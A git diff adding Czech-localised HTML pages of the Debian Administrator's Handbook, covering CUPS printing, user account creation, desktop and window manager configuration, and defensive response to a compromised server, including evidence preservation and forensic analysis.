+			CUPS (Common Unix Printing System) is a project (and a trademark) managed by Apple, Inc. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.cups.org/">http://www.cups.org/</a></div>
+		</div></div><div
+          class="para">
+			After installation of these different packages, <code
+            class="command">cups</code> is administered easily through a web interface accessible at the local address: <code
+            class="literal">http://localhost:631/</code>. There you can add printers (including network printers), remove, and administer them. You can also administer <code
+            class="command">cups</code> with the graphical interface provided by the desktop environment. Finally, there is also the <code
+            class="command">system-config-printer</code> graphical interface (from the Debian package of the same name).
+		</div><a
+          id="id-1.11.11.14"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> Obsolescence of <code
+                      class="filename">/etc/printcap</code></strong></p></div></div></div><div
+            class="para">
+			<span
+              class="emphasis"><em>cups</em></span> no longer uses the <code
+              class="filename">/etc/printcap</code> file, which is now obsolete. Programs that rely upon this file to get a list of available printers will, thus, fail. To avoid this problem, delete this file and make it a symbolic link (see sidebar <a
+              class="xref"
+              href="sect.config-misc.html#sidebar.symbolic-link"><span
+                class="emphasis"><em>BACK TO BASICS</em></span> Symbolic links</a>) to <code
+              class="filename">/run/cups/printcap</code>, which is maintained by <span
+              class="emphasis"><em>cups</em></span> to ensure compatibility.
+		</div><a
+            id="id-1.11.11.15.3"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.shell-environment.html"><strong>Předcházející</strong>8.6. Shell Environment</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-bootloader.html"><strong>Další</strong>8.8. Configuring the Bootloader</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html
new file mode 100644
index 000000000..4e21215a8
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.creating-accounts.html
@@ -0,0 +1,158 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.5. Creating Accounts</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.user-group-databases.html"
+        title="8.4. User and Group Databases" /><link
+        rel="next"
+        href="sect.shell-environment.html"
+        title="8.6. Shell Environment" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.creating-accounts.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-group-databases.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.shell-environment.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.creating-accounts"></a>8.5. Creating Accounts</h2></div></div></div><a
+          id="id-1.11.9.2"
+          class="indexterm"></a><a
+          id="id-1.11.9.3"
+          class="indexterm"></a><div
+          class="para">
+			One of the first actions an administrator needs to do when setting up a new machine is to create user accounts. This is typically done using the <code
+            class="command">adduser</code> command which takes a user-name for the new user to be created, as an argument.
+		</div><a
+          id="id-1.11.9.5"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">adduser</code> command asks a few questions before creating the account, but its usage is fairly straightforward. Its configuration file, <code
+            class="filename">/etc/adduser.conf</code>, includes all the interesting settings: it can be used to automatically set a quota for each new user by creating a user template, or to change the location of user accounts; the latter is rarely useful, but it comes in handy when you have a large number of users and want to divide their accounts over several disks, for instance. You can also choose a different default shell.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Quota</strong></p></div></div></div><a
+            id="id-1.11.9.7.2"
+            class="indexterm"></a><div
+            class="para">
+			The term “quota” refers to a limit on machine resources that a user is allowed to use. This frequently refers to disk space.
+		</div></div><div
+          class="para">
+			The creation of an account populates the user's home directory with the contents of the <code
+            class="filename">/etc/skel/</code> template. This provides the user with a set of standard directories and configuration files.
+		</div><a
+          id="id-1.11.9.9"
+          class="indexterm"></a><a
+          id="id-1.11.9.10"
+          class="indexterm"></a><div
+          class="para">
+			In some cases, it will be useful to add a user to a group (other than their default “main” group) in order to grant them additional permissions. For example, a user who is included in the <span
+            class="emphasis"><em>audio</em></span> group can access audio devices (see sidebar <a
+            class="xref"
+            href="sect.creating-accounts.html#sidebar.special-files"><span
+              class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</a>). This can be achieved with a command such as <code
+            class="command">adduser <em
+              class="replaceable">user</em> <em
+              class="replaceable">group</em></code>.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.special-files"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</strong></p></div></div></div><a
+            id="id-1.11.9.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.3"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.4"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.5"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.6"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.7"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.8"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.9"
+            class="indexterm"></a><div
+            class="para">
+			Each hardware peripheral device is represented under Unix with a special file, usually stored in the file tree under <code
+              class="filename">/dev/</code> (DEVices). Two types of special files exist according to the nature of the device: “character mode” and “block mode” files, each mode allowing for only a limited number of operations. While character mode limits interaction with read/write operations, block mode also allows seeking within the available data. Finally, each special file is associated with two numbers (“major” and “minor”) that identify the device to the kernel in a unique manner. Such a file, created by the <code
+              class="command">mknod</code> command, simply contains a symbolic (and more human-friendly) name.
+		</div><div
+            class="para">
+			The permissions of a special file map to the permissions necessary to access the device itself. Thus, a file such as <code
+              class="filename">/dev/mixer</code>, representing the audio mixer, only has read/write permissions for the root user and members of the <code
+              class="literal">audio</code> group. Only these users can operate the audio mixer.
+		</div><div
+            class="para">
+			It should be noted that the combination of <span
+              class="pkg pkg">udev</span>, <span
+              class="pkg pkg">consolekit</span> and <span
+              class="pkg pkg">policykit</span> can add additional permissions to allow users physically connected to the console (and not through the network) to access to certain devices.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-group-databases.html"><strong>Předcházející</strong>8.4. User and Group Databases</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.shell-environment.html"><strong>Další</strong>8.6. Shell Environment</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html
new file mode 100644
index 000000000..89319007c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.customizing-graphical-interface.html
@@ -0,0 +1,238 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.2. Customizing the Graphical Interface</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="next"
+        href="sect.graphical-desktops.html"
+        title="13.3. Graphical Desktops" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.customizing-graphical-interface.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="workstation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.graphical-desktops.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.customizing-graphical-interface"></a>13.2. Customizing the Graphical Interface</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.5.2"></a>13.2.1. Choosing a Display Manager</h3></div></div></div><a
+            id="id-1.16.5.2.2"
+            class="indexterm"></a><a
+            id="id-1.16.5.2.3"
+            class="indexterm"></a><a
+            id="id-1.16.5.2.4"
+            class="indexterm"></a><a
+            id="id-1.16.5.2.5"
+            class="indexterm"></a><div
+            class="para">
+				The graphical interface only provides display space. Running the X server by itself only leads to an empty screen, which is why most installations use a <span
+              class="emphasis"><em>display manager</em></span> to display a user authentication screen and start the graphical desktop once the user has authenticated. The three most popular display managers in current use are <span
+              class="pkg pkg">gdm3</span> (<span
+              class="foreignphrase"><em
+                class="foreignphrase">GNOME Display Manager</em></span>), <span
+              class="pkg pkg">sddm</span> (suggested for KDE Plasma) and <span
+              class="pkg pkg">lightdm</span> (<span
+              class="foreignphrase"><em
+                class="foreignphrase">Light Display Manager</em></span>). Since the Falcot Corp administrators have opted to use the GNOME desktop environment, they logically picked <code
+              class="command">gdm3</code> as a display manager too. The <code
+              class="filename">/etc/gdm3/daemon.conf</code> configuration file has many options (the list can be found in the <code
+              class="filename">/usr/share/gdm/gdm.schemas</code> schema file) to control its behaviour while <code
+              class="filename">/etc/gdm3/greeter.dconf-defaults</code> contains settings for the greeter “session” (more than just a login window, it is a limited desktop with power management and accessibility related tools). Note that some of the most useful settings for end-users can be tweaked with GNOME's control center.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.5.3"></a>13.2.2. Choosing a Window Manager</h3></div></div></div><div
+            class="para">
+				Since each graphical desktop provides its own window manager, which window manager you choose is usually influenced by which desktop you have selected. GNOME uses the <code
+              class="command">mutter</code> window manager, Plasma uses <code
+              class="command">kwin</code>, and Xfce (which we present later) has <code
+              class="command">xfwm</code>. The Unix philosophy always allows using one's window manager of choice, but following the recommendations allows an administrator to best take advantage of the integration efforts led by each project.
+			</div><a
+            id="id-1.16.5.3.3"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.4"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Window manager</strong></p></div></div></div><a
+              id="id-1.16.5.3.6.2"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.6.3"
+              class="indexterm"></a><div
+              class="para">
+				The window manager displays the “decorations” around the windows belonging to the currently running applications, which includes frames and the title bar. It also allows reducing, restoring, maximizing, and hiding windows. Most window managers also provide a menu that pops up when the desktop is clicked in a specific way. This menu provides the means to close the window manager session, start new applications, and in some cases, change to another window manager (if installed).
+			</div></div><div
+            class="para">
+				Older computers may, however, have a hard time running heavyweight graphical desktop environments. In these cases, a lighter configuration should be used. “Light” (or small footprint) window managers include WindowMaker (in the <span
+              class="pkg pkg">wmaker</span> package), Afterstep, fvwm, icewm, blackbox, fluxbox, or openbox. In these cases, the system should be configured so that the appropriate window manager gets precedence; the standard way is to change the <code
+              class="command">x-window-manager</code> alternative with the command <code
+              class="command">update-alternatives --config x-window-manager</code>.
+			</div><a
+            id="id-1.16.5.3.8"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.9"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.10"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.11"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.12"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.13"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.14"
+            class="indexterm"></a><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.alternatives"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DEBIAN SPECIFICITY</em></span> Alternatives</strong></p></div></div></div><a
+              id="id-1.16.5.3.15.2"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.3"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.4"
+              class="indexterm"></a><div
+              class="para">
+				The Debian policy lists a number of standardized commands able to perform a particular action. For example, the <code
+                class="command">x-window-manager</code> command invokes a window manager. But Debian does not assign this command to a fixed window manager. The administrator can choose which manager it should invoke.
+			</div><div
+              class="para">
+				For each window manager, the relevant package therefore registers the appropriate command as a possible choice for <code
+                class="command">x-window-manager</code> along with an associated priority. Barring explicit configuration by the administrator, this priority allows picking the best installed window manager when the generic command is run.
+			</div><div
+              class="para">
+				Both the registration of commands and the explicit configuration involve the <code
+                class="command">update-alternatives</code> script. Choosing where a symbolic command points at is a simple matter of running <code
+                class="command">update-alternatives --config <em
+                  class="replaceable">symbolic-command</em></code>. The <code
+                class="command">update-alternatives</code> script creates (and maintains) symbolic links in the <code
+                class="filename">/etc/alternatives/</code> directory, which in turn references the location of the executable. As time passes, packages are installed or removed, and/or the administrator makes explicit changes to the configuration. When a package providing an alternative is removed, the alternative automatically goes to the next best choice among the remaining possible commands.
+			</div><div
+              class="para">
+				Not all symbolic commands are explicitly listed by the Debian policy; some Debian package maintainers deliberately chose to use this mechanism in less straightforward cases where it still brings interesting flexibility (examples include <code
+                class="command">x-www-browser</code>, <code
+                class="command">www-browser</code>, <code
+                class="command">cc</code>, <code
+                class="command">c++</code>, <code
+                class="command">awk</code>, and so on).
+			</div><a
+              id="id-1.16.5.3.15.9"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.10"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.11"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.12"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.13"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.5.4"></a>13.2.3. Menu Management</h3></div></div></div><a
+            id="id-1.16.5.4.2"
+            class="indexterm"></a><a
+            id="id-1.16.5.4.3"
+            class="indexterm"></a><div
+            class="para">
+				Modern desktop environments and many window managers provide menus listing the available applications for the user. In order to keep menus up-to-date in relation to the actual set of available applications, each package usually provides a <code
+              class="filename">.desktop</code> file in <code
+              class="filename">/usr/share/applications</code>. The format of those files has been standardized by FreeDesktop.org: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://standards.freedesktop.org/desktop-entry-spec/latest/">https://standards.freedesktop.org/desktop-entry-spec/latest/</a></div>
+			</div><div
+            class="para">
+				The applications menus can be further customized by administrators through system-wide configuration files as described by the “Desktop Menu Specification”. End-users can also customize the menus with graphical tools such as <span
+              class="pkg pkg">kmenuedit</span> (in Plasma), <span
+              class="pkg pkg">alacarte</span> (in GNOME) or <span
+              class="pkg pkg">menulibre</span>. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://standards.freedesktop.org/menu-spec/latest/">https://standards.freedesktop.org/menu-spec/latest/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>HISTORY</em></span> The Debian menu system</strong></p></div></div></div><div
+              class="para">
+				Historically — way before the FreeDesktop.org standards emerged — Debian had invented its own menu system where each package provided a generic description of the desired menu entries in <code
+                class="filename">/usr/share/menu/</code>. This tool is still available in Debian (in the <span
+                class="pkg pkg">menu</span> package) but it is only marginally useful since package maintainers are encouraged to rely on <code
+                class="filename">.desktop</code> files instead.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="workstation.html"><strong>Předcházející</strong>Kapitola 13. Workstation</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.graphical-desktops.html"><strong>Další</strong>13.3. Graphical Desktops</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html
new file mode 100644
index 000000000..bf71cc30e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dealing-with-compromised-machine.html
@@ -0,0 +1,309 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.7. Dealing with a Compromised Machine</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.other-security-considerations.html"
+        title="14.6. Other Security-Related Considerations" /><link
+        rel="next"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dealing-with-compromised-machine.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-security-considerations.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="debian-packaging.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dealing-with-compromised-machine"></a>14.7. Dealing with a Compromised Machine</h2></div></div></div><div
+          class="para">
+			Despite the best intentions and however carefully designed the security policy, an administrator eventually faces an act of hijacking. This section provides a few guidelines on how to react when confronted with these unfortunate circumstances.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.10.3"></a>14.7.1. Detecting and Seeing the Cracker's Intrusion</h3></div></div></div><div
+            class="para">
+				The first step of reacting to cracking is to be aware of such an act. This is not self-evident, especially without an adequate monitoring infrastructure.
+			</div><div
+            class="para">
+				Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance one named <code
+              class="literal">apache</code> instead of the standard <code
+              class="literal">/usr/sbin/apache2</code>. If we follow that example, the thing to do is to note its process identifier, and check <code
+              class="filename">/proc/<em
+                class="replaceable">pid</em>/exe</code> to see what program this process is currently running:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>ls -al /proc/3719/exe</code></strong>
+<code
+              class="computeroutput">lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -&gt; /var/tmp/.bash_httpd/psybnc</code>
+</pre><div
+            class="para">
+				A program installed under <code
+              class="filename">/var/tmp/</code> and running as the web server? No doubt left, the machine is compromised.
+			</div><div
+            class="para">
+				This is only one example, but many other hints can ring the administrator's bell:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						an option to a command that no longer works; the version of the software that the command claims to be doesn't match the version that is supposed to be installed according to <code
+                    class="command">dpkg</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						a command prompt or a session greeting indicating that the last connection came from an unknown server on another continent;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						errors caused by the <code
+                    class="filename">/tmp/</code> partition being full, which turned out to be full of illegal copies of movies;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						and so on.
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.10.4"></a>14.7.2. Putting the Server Off-Line</h3></div></div></div><div
+            class="para">
+				In any but the most exotic cases, the cracking comes from the network, and the attacker needs a working network to reach their targets (access confidential data, share illegal files, hide their identity by using the machine as a relay, and so on). Unplugging the computer from the network will prevent the attacker from reaching these targets, if they haven't managed to do so yet.
+			</div><div
+            class="para">
+				This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it's usually a good idea to start by gathering some important information (see <a
+              class="xref"
+              href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">14.7.3 – „Keeping Everything that Could Be Used as Evidence“</a>, <a
+              class="xref"
+              href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">14.7.5 – „Forensic Analysis“</a> and <a
+              class="xref"
+              href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">14.7.6 – „Reconstituting the Attack Scenario“</a>), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but <code
+              class="command">sshd</code>). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.keeping-everything-that-could-be-used-as-evidence"></a>14.7.3. Keeping Everything that Could Be Used as Evidence</h3></div></div></div><div
+            class="para">
+				Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
+			</div><div
+            class="para">
+				In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (<code
+              class="command">netstat -tupan</code> for network connections, <code
+              class="command">ps auxf</code> for a list of processes, <code
+              class="command">ls -alR /proc/[0-9]*</code> for a little more information on running programs), and every performed check should carefully be written down.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Hot analysis</strong></p></div></div></div><div
+              class="para">
+				While it may seem tempting to analyze the system as it runs, especially when the server is not physically reachable, this is best avoided: quite simply you can't trust the programs currently installed on the compromised system. It's quite possible for a subverted <code
+                class="command">ps</code> command to hide some processes, or for a subverted <code
+                class="command">ls</code> to hide files; sometimes even the kernel is compromised!
+			</div><div
+              class="para">
+				If such a hot analysis is still required, care should be taken to only use known-good programs. A good way to do that would be to have a rescue CD with pristine programs, or a read-only network share. However, even those countermeasures may not be enough if the kernel itself is compromised.
+			</div></div><div
+            class="para">
+				Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running <code
+              class="command">sync</code>) and reboot it on a rescue CD. Each partition should be copied with a tool such as <code
+              class="command">dd</code>; these images can be sent to another server (possibly with the very convenient <code
+              class="command">nc</code> tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.10.6"></a>14.7.4. Re-installing</h3></div></div></div><a
+            id="id-1.17.10.6.2"
+            class="indexterm"></a><div
+            class="para">
+				The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly <span
+              class="emphasis"><em>backdoors</em></span>). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
+			</div><div
+            class="para">
+				Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems. Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.forensic-analysis"></a>14.7.5. Forensic Analysis</h3></div></div></div><div
+            class="para">
+				Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the <code
+              class="literal">ro,nodev,noexec,noatime</code> options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake.
+			</div><div
+            class="para">
+				Retracing an attack scenario usually involves looking for everything that was modified and executed:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">.bash_history</code> files often provide for a very interesting read;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						so does listing files that were recently created, modified or accessed;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the <code
+                    class="command">strings</code> command helps identifying programs installed by the attacker, by extracting text strings from a binary;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the log files in <code
+                    class="filename">/var/log/</code> often allow reconstructing a chronology of events;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						special-purpose tools also allow restoring the contents of potentially deleted files, including log files that attackers often delete.
+					</div></li></ul></div><div
+            class="para">
+				Some of these operations can be made easier with specialized software. In particular, the <span
+              class="pkg pkg">sleuthkit</span> package provides many tools to analyze a filesystem. Their use is made easier by the <span
+              class="emphasis"><em>Autopsy Forensic Browser</em></span> graphical interface (in the <span
